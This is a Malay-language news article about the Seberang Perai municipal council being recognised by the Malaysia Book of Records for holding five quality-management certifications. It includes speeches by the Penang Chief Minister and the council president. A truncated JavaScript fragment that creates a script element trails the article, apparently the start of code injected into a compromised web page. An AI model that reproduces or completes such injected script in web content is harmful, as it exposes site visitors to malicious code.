Pengiktirafan MBOR, kejayaan bersama semua kakitangan MPSP – YDP

SEBERANG JAYA – Majlis Perbandaran Seberang Perai (MPSP) diiktiraf oleh The Malaysia Book of Records (MBOR) sebagai pihak berkuasa tempatan (PBT) pertama di tanah air ini yang berjaya mendapat lima pensijilan bagi sistem pengurusan berteraskan kualiti.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng dalam ucapannya merakamkan penghargaan kepada Yang di-Pertua MPSP, Dato’ Maimunah Mohd. Sharif atas kejayaan itu, sekaligus menjadi kebanggaan kepada Kerajaan Negeri Pulau Pinang.

“Tahniah kepada Dato’ Maimunah (Maimunah) kerana berjaya membawa MPSP hingga disenaraikan dalam MBOR.

“Ini, membuktikan bahawa tindakan Kerajaan Negeri melantik Yang di-Pertua (YDP) dan Datuk Bandar dalam kalangan kakitangan kerajaan yang mampu membuat kerja walaupun seorang wanita, adalah di landasan yang betul,” ujarnya pada Majlis Penyerahan Sijil MBOR di sini baru-baru ini.

Difahamkan, MPSP berjaya mendapat sijil Sistem Pengurusan Kualiti ISO 9001:2008 (QMS), Sistem Pengurusan Alam Sekitar
ISO 140001:2004 (EMS), Sistem Pengurusan Keselamatan dan Keselamatan Pekerjaan OHSAS 18001:2007, Sistem Pengurusan Tenaga ISO 50001:2011 (EnMS) dan Sistem Pengurusan Persekitaran Berkualiti 5S (QEMS).

Sebelum itu, (Maimunah) dalam ucapannya memberitahu bahawa pengiktirafan kepada MPSP itu sebenarnya berkat kerja secara berpasukan.

“Ini sebenarnya bukan kejayaan seorang Maimunah sahaja, tetapi ini adalah kejayaan bersama semua kakitangan MPSP, serta
sokongan tidak berbelah-bahagi daripada Kerajaan Negeri sendiri pada setiap rancangan kita (PBT) untuk meningkatkan mutu
pengurusan serta mutu pelanggan,” jelas beliau.

Dalam perkembangan lain, Maimunah memberitahu bahawa MPSP sedang berusaha mendapatkan pensijilan Sistem Pengurusan Keselamatan Maklumat (SMS ISO 27001:2013).

“Pensijilan kualiti ini juga merupakan satu usaha yang dilihat oleh PBT-PBT yang maju di dunia ini untuk menjalinkan persahabatan dua hala.

“MPSP dapat menjalinkan hubungan di peringkat antarabangsa, contohnya dengan Seoul (Korea) dan kita juga akan menandatangani Memorandum Persefahaman dengan Yokohama City Council tidak lama lagi,” jelas beliau.

Setiausaha MPSP, Sr. Rozali Mohamud serta dua Ahli Majlis lain, Loh Joo Huat dan Amir Md. Ghazali turut menyertai sidang media tersebut.

var d=document;var s=d.createElement(‘script’);